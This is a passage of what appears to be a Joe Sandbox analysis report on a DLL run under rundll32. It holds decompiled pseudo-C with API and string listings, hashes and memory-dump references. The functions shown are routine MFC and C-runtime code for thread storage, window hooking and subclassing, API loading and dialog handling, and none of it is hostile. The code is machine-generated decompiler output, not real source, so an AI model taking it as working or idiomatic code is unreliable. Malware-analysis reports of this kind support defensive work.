							 *0x1005aea8 = E1001BD03( *0x1005aea8);
							 *0x1005aeac = E1001BD03( *0x1005aeac);
							 *0x1005aeb0 = E1001BD03( *0x1005aeb0);
							_t18 = E1001A3D3();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E1001BE05();
								goto L15;
							} else {
								_push(E1001BF91);
								_t21 =  *((intOrPtr*)(E1001BD6F( *0x1005aea4)))();
								__eflags = _t21 - 0xffffffff;
								 *0x10057d2c = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E1001E76E(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x10057d2c);
										__eflags =  *((intOrPtr*)(E1001BD6F( *0x1005aeac)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E1001BE42(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E1001BE05();
					return 0;
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10017978,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C121
__mtterm.LIBCMT ref: 1001C12D

Part of subcall function 1001BE05: __decode_pointer.LIBCMT ref: 1001BE16
Part of subcall function 1001BE05: TlsFree.KERNEL32(0000001F,10017A14,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001BE30

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001C143
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1001C150
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 1001C15D
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001C16A
TlsAlloc.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1BA
TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1D5
__init_pointers.LIBCMT ref: 1001C1DF
__encode_pointer.LIBCMT ref: 1001C1EA
__encode_pointer.LIBCMT ref: 1001C1FA
__encode_pointer.LIBCMT ref: 1001C20A
__encode_pointer.LIBCMT ref: 1001C21A
__decode_pointer.LIBCMT ref: 1001C23B
__calloc_crt.LIBCMT ref: 1001C254
__decode_pointer.LIBCMT ref: 1001C26E
__initptd.LIBCMT ref: 1001C27D
GetCurrentThreadId.KERNEL32 ref: 1001C284

Strings

FlsGetValue, xrefs: 1001C145
FlsFree, xrefs: 1001C15F
KERNEL32.DLL, xrefs: 1001C11C
FlsSetValue, xrefs: 1001C152
FlsAlloc, xrefs: 1001C13D

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2657569430-3819984048
Opcode ID: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
Instruction ID: b5f7097eefea174a9ed91942db92a94305995674aef8197461d434292f48097b
Opcode Fuzzy Hash: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
Instruction Fuzzy Hash: E4319335900735AFEB11EFB59CCEA4A3BF1EB46360B144526F5049A1B1EBB5D8C0CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10011389, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10011389(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E10017C2A(E1002866E, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x1000a0f5);
				 *(_t116 - 0x120) = _t110;
				_t54 = E10013D98(_t94, 0x10058f44, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E1000A0DB(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t55 = E1000D5EC(_t94, _t106, _t111, __eflags);
					__eflags = _t111;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x1005acbc;
						if( *0x1005acbc == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x1005a8dc;
								if( *0x1005a8dc != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x1005a8dc; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t116 - 0x14) = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E10011245);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E100174D0(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E1000E5E2(_t94, _t97, _t106, "#32768", __eflags);
								__eflags = _t72;
								 *0x1005a8dc = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E100199C1(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1000D638(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E1000FB9D(_t111, _t116, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001025C);
							__eflags = _t83 - E1001025C;
							if(_t83 != E1001025C) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E1000CEFC();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E1000A7E1(_t87, "ime");
						__eflags = _t88;
						_pop(_t97);
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E10017C74(_t94, _t105, _t110);
				}
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 10011393

Part of subcall function 10013D98: __EH_prolog3.LIBCMT ref: 10013D9F

CallNextHookEx.USER32 ref: 100113D7

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetClassLongA.USER32 ref: 1001141B
GlobalGetAtomNameA.KERNEL32 ref: 10011445
SetWindowLongA.USER32(?,000000FC,Function_0001025C), ref: 1001149A
_memset.LIBCMT ref: 100114E4
GetClassLongA.USER32 ref: 10011514
GetClassNameA.USER32(?,?,00000100), ref: 10011535
GetWindowLongA.USER32 ref: 10011559
GetPropA.USER32 ref: 10011573
SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001157E
GetPropA.USER32 ref: 10011586
GlobalAddAtomA.KERNEL32 ref: 1001158E
SetWindowLongA.USER32(?,000000FC,Function_00011245), ref: 1001159C
CallNextHookEx.USER32 ref: 100115B4
UnhookWindowsHookEx.USER32(?), ref: 100115C8

Strings

#32768, xrefs: 100114F6, 100114FB, 10011545
ime, xrefs: 1001144E
AfxOldWndProc423, xrefs: 1001156C, 10011571, 1001157C, 10011584, 1001158D

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 1191297049-4034971020
Opcode ID: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
Instruction ID: 45731ac5847e6eda9355a9c996fe1b8867c86b30351497dbe8ef7f26860efac9
Opcode Fuzzy Hash: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
Instruction Fuzzy Hash: 09619E31900666EFEB14DB61CC49BDE7BA9EF483A1F214254F506AB191DB34DEC1CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000D6C3, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000D6C3() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x1005a76c; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x1005a770 = E1000D66B(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x1005a750 = 0;
						 *0x1005a754 = 0;
						 *0x1005a758 = 0;
						 *0x1005a75c = 0;
						 *0x1005a760 = 0;
						 *0x1005a764 = 0;
						 *0x1005a768 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x1005a750 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x1005a754 = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x1005a758 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x1005a75c = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x1005a764 = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x1005a760 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x1005a768 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x1005a76c = 1;
					return _t5;
				} else {
					_t24 =  *0x1005a760; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,74ED5D80,1000D80F,?,?,?,?,?,?,?,1000F61E,00000000,00000002,00000028), ref: 1000D6EC
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 1000D708
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 1000D719
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000D72A
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000D73B
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000D74C
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000D75D
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 1000D76E

Strings

EnumDisplayMonitors, xrefs: 1000D746
GetSystemMetrics, xrefs: 1000D702
MonitorFromPoint, xrefs: 1000D735
MonitorFromRect, xrefs: 1000D724
MonitorFromWindow, xrefs: 1000D713
EnumDisplayDevicesA, xrefs: 1000D768
USER32, xrefs: 1000D6E2
GetMonitorInfoA, xrefs: 1000D757

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
Instruction ID: 93615fb53cb164fe7f3d347b700eade87a81924dee4312457033af375ccc55a3
Opcode Fuzzy Hash: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
Instruction Fuzzy Hash: 7921E3B19097699BE701EF369DC856DBAF5F34F281391453FE109D2528EB3884C6EE20

Uniqueness

Uniqueness Score: -1.00%

Function 1000F530, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000F530(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E10012862(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E1000D86F(_t121, E1000D804(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E1000A7CE();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E1000D86F(_t121, E1000D804(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1001297A(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

APIs

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

GetParent.USER32(?), ref: 1000F55D
SendMessageA.USER32 ref: 1000F580
GetWindowRect.USER32 ref: 1000F59A
GetWindowLongA.USER32 ref: 1000F5B0
CopyRect.USER32 ref: 1000F5FD
CopyRect.USER32 ref: 1000F607
GetWindowRect.USER32 ref: 1000F610
CopyRect.USER32 ref: 1000F62C

Strings

(, xrefs: 1000F5C8

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
Instruction ID: 3f3129d87232bc90929dbfd76231b55f7e5f3d8dd267dcccc126c4261812b80e
Opcode Fuzzy Hash: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
Instruction Fuzzy Hash: 84517072900619AFEB00DFA8CC85EEEBBB9EF48290F154119FA05F3594DB30ED419B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000A1F9, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000A1F9(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t16 = __esi;
				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x10058f2c; // 0x0
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					_t20 = _t15;
					if(_t15 == 0) {
						L2:
						E1000A0DB(0, _t12, _t15, _t16, _t20);
					}
					 *0x10058f1c = GetProcAddress(_t15, "CreateActCtxA");
					 *0x10058f20 = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x10058f24 = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x10058f1c; // 0x0
					 *0x10058f28 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x10058f20; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x10058f24; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x10058f20; // 0x0
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x10058f24; // 0x0
							if(_t23 == 0) {
								goto L2;
							} else {
								_t20 = _t9;
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x10058f2c = 1;
				}
				return _t18;
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1000ACB1,000000FF), ref: 1000A21B
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 1000A239
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 1000A246
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 1000A253
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1000A260

Strings

CreateActCtxA, xrefs: 1000A233
KERNEL32, xrefs: 1000A216
ReleaseActCtx, xrefs: 1000A23B
DeactivateActCtx, xrefs: 1000A255
ActivateActCtx, xrefs: 1000A248

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
Instruction ID: c20c66116e7296d4a0afd5037f2dffc74684b1862cb446d2da729e570b87d5d5
Opcode Fuzzy Hash: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
Instruction Fuzzy Hash: 3611C076C04266EBFB10DFA9ACC45097BE5E74F2D8301423FEA05A2124D7720980CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB74, Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000CB74(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E10017BF4(E10028029, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E1000D5EC(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E1000D5EC(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E1000C6AC(_t84, _t100, __eflags);
					E1000FC04(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E1000A7CE();
								__eflags = _t84;
								 *(_t101 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E100128F8(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E10012913(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E100115DC(_t96, __eflags, _t100);
					_t58 = E1000FB5C(_t84, _t86, _t101,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E1000C984(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E10012862(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E1000F6F2(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E1001297A(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E10012913(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
